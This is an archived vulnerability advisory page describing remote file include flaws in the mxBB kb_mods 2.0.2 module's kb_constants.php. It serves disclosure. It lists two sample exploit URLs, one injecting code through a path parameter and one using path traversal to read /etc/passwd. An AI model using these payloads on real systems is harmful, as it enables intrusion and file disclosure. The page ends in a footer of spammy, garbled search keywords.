about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , MXBB KB_Mods Module KB_Constants.PHP Multiple File Include Vulnerabilities


Title MXBB KB_Mods Module KB_Constants.PHP Multiple File Include Vulnerabilities
Published 2006-12-13-12:00AM
Updated 2006-12-14-04:18PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Dr Max Virus is credited with the discovery of these vulnerabilities.
Vulnerable  mxBB kb_mods 2.0.2
Not Vulnerable  
Code   An attacker can exploit these issues via a web client.

The following sample exploits are available:

http://www.example.com/[path]/includes/kb_constants.php?module_root_path=Evil Code
http://www.example.com/[path]/includes/kb_constants.php?kb_constants.php&board_config[default_lang]=english&phpEx=../../../../../etc/passwd
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 19:12:02 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
doge aflam+sex+ localhost Nokia+3110 Indo sex News Searc pakisthan. jenna jame port 7.htm everquest ASS BABE film dansi actrees se Artis+porn world sex ghjhj Aldultsex t182t Invasion P maxcpm.inf www.ftv .i www.rudetu part Los inquie dmoz.im ccm Www.BP FIL sexy vidio nastysex allinta php-nuke 2 www.arabse free xxx v maxcpm.inf www.chuzho maxcpm.inf www.sublim sexyirania components components ftvangles t781t brest mas washington ftvangles news for c c..._magaz maxcpm.inf CAP_NET_AD The remote